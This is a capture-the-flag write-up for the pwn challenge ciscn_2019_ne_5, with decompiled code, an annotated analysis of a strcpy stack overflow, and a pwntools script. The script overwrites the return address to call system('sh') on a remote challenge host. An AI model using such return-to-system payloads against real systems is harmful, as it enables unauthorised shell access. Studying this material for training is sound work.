
ciscn_2019_ne_5

ubuntu18


0x01


checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_ne_5/ciscn_2019_ne_5'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

运行之后直接得到了shell …

IDA

main()

/*
 * IDA pseudocode of main() from the ciscn_2019_ne_5 binary (i386, no PIE,
 * no stack canary, NX enabled per the checksec output above).  Reads an
 * admin password, prints a 0-3 menu and dispatches on the chosen number.
 * _DWORD, __isoc99_scanf and sub_804892B are decompiler / glibc names, so
 * this listing documents the binary and is not meant to compile as-is.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax
int v4; // [esp+0h] [ebp-100h] BYREF -- menu choice read by scanf("%d"); never initialised
char src[4]; // [esp+4h] [ebp-FCh] BYREF -- log buffer start, contiguous with v6
char v6[124]; // [esp+8h] [ebp-F8h] BYREF -- src+v6 form one 128-byte region that AddLog fills
char s1[4]; // [esp+84h] [ebp-7Ch] BYREF -- password buffer start, contiguous with v8
char v8[96]; // [esp+88h] [ebp-78h] BYREF -- s1+v8 form one 100-byte region
int *v9; // [esp+F4h] [ebp-Ch]

v9 = &argc; // presumably the decompiler's rendering of the stack-realignment prologue, not program logic
setbuf(stdin, 0); // unbuffered stdio so prompts are emitted immediately
setbuf(stdout, 0);
setbuf(stderr, 0);
fflush(stdout);
*(_DWORD *)s1 = 48; // stores the 32-bit value 48 ("0\0\0\0") into the first four bytes of s1
memset(v8, 0, sizeof(v8));
*(_DWORD *)src = 48; // same initialiser for the log buffer
memset(v6, 0, sizeof(v6));
puts("Welcome to use LFS.");
printf("Please input admin password:");
/* Width 100 equals sizeof s1 + sizeof v8, so a 100-character input places
 * the terminating NUL one byte past v8; a width of 99 would stay in bounds. */
__isoc99_scanf("%100s", s1);
if ( strcmp(s1, "administrator") ) // only the literal "administrator" avoids the exit() below
{
puts("Password Error!");
exit(0);
}
puts("Welcome!");
puts("Input your operation:");
puts("1.Add a log."); // the menu advertises 0-3 only; case 4 below is not listed
puts("2.Display all logs.");
puts("3.Print all logs.");
printf("0.Exit\n:");
__isoc99_scanf("%d", &v4); // return value unchecked: on non-numeric input v4 keeps its uninitialised value
switch ( v4 )
{
case 0:
exit(0);
return result; // unreachable: exit() does not return
case 1: // AddLog stores user input into src (see AddLog below)
AddLog(src);
result = sub_804892B(argc, argv, envp); // unnamed helper, not shown on this page; called on every menu path
break;
case 2: // not relevant to the overflow analysed in this writeup
Display(src);
result = sub_804892B(argc, argv, envp);
break;
case 3: // not relevant to the overflow analysed in this writeup
Print();
result = sub_804892B(argc, argv, envp);
break;
case 4:
GetFlag(src); // hidden menu entry; copies src with an unbounded strcpy (see GetFlag below)
result = sub_804892B(argc, argv, envp);
break;
default:
result = sub_804892B(argc, argv, envp);
break;
}
return result;
}

AddLog()

/*
 * IDA pseudocode of AddLog(): prompts for a log line and stores it with
 * scanf("%128s") at the address held in a1.  The decompiler typed the
 * destination as int; main() passes its 128-byte src region.  The width
 * bears no relation to a destination size this function can see, and 128
 * characters plus the terminating NUL is 129 bytes, one past a 128-byte
 * buffer.  A defensive version would take the buffer size as a parameter
 * and use a width of size-1 (%127s for main's buffer).
 * Returns scanf's result (1 on success, 0 or EOF otherwise).
 */
int __cdecl AddLog(int a1)
{
printf("Please input new log info:");
return __isoc99_scanf("%128s", a1); // user-controlled bytes land in main's src buffer
}

GetFlag()

/*
 * IDA pseudocode of GetFlag(): copies src into a fixed stack buffer and
 * prints it.  dest[4] and v3[60] are adjacent (ebp-0x48 .. ebp-0x8), and
 * strcpy() copies until src's NUL with no bound, so a src longer than the
 * 0x48 bytes between dest and the saved ebp overwrites the saved frame
 * pointer and return address -- the overflow this writeup analyses.  With
 * no stack canary and no PIE (checksec above) nothing detects or
 * randomises that.  Code fix: one buffer of the intended size and a
 * bounded copy such as snprintf(buf, sizeof buf, "%s", src); build fixes:
 * -fstack-protector and PIE.
 * Returns printf's character count.
 */
int __cdecl GetFlag(char *src)
{
char dest[4]; // [esp+0h] [ebp-48h] BYREF -- copy target, contiguous with v3
char v3[60]; // [esp+4h] [ebp-44h] BYREF

*(_DWORD *)dest = 48; // stores the 32-bit value 48 ("0\0\0\0") into dest
memset(v3, 0, sizeof(v3));
strcpy(dest, src); // unbounded copy: src's length is user-controlled via AddLog, the dest+v3 region is 64 bytes
return printf("The flag is your log:%s\n", dest); // echoes whatever was copied, starting at dest
}

0x02


思路

  1. 控制src（GetFlag 中 dest 位于 ebp-0x48）
  2. strcpy(dest,src)处溢出至system() //0x80484D0

存在sh字符串

LOAD:080482E6 00000007 C fflush

080482E0 5F 75 73 65 64 00 66 66 6C 75 73 68 00 73 74 72 _used.fflush.str

取0x80482EA即可

s 0x48
ebp 0x4
ret system()
system_ret 0xdeadbeef
arg sh

0x03


# Exploit script from the writeup (pwntools, Python 3 bytes API).  Each
# step corresponds to a prompt printed by the decompiled main()/AddLog()
# above and to the stack layout table in section 0x02.
from pwn import *

io = remote('node4.buuoj.cn', 26736)  # challenge instance named in the writeup

context(os='linux', arch='i386', log_level='debug')  # 32-bit target; debug logs every byte exchanged
io.sendlineafter(b'rd:', b'administrator')  # "Please input admin password:" -- main()'s strcmp requires this value
io.sendlineafter(b'on:', b'1')  # "Input your operation:" -- menu case 1, AddLog(src)
padding = 0x48 + 0x4  # dest is at ebp-0x48 in GetFlag(); +4 covers the saved ebp (layout table above)
system = 0x80484D0  # system() address given in section 0x02; fixed because the binary has no PIE
sh = 0x80482EA  # "sh" tail of the "fflush" string at 0x80482E6
payload = b'a' * padding + p32(system) + p32(0xdeadbeef) + p32(sh)  # ret -> system, dummy return, arg "sh"
io.sendlineafter(b'fo:', payload)  # "Please input new log info:" -- stored into src by scanf("%128s")
io.sendline(b'4')  # hidden menu case 4 -> GetFlag(src), whose strcpy copies the payload over its frame
io.interactive()

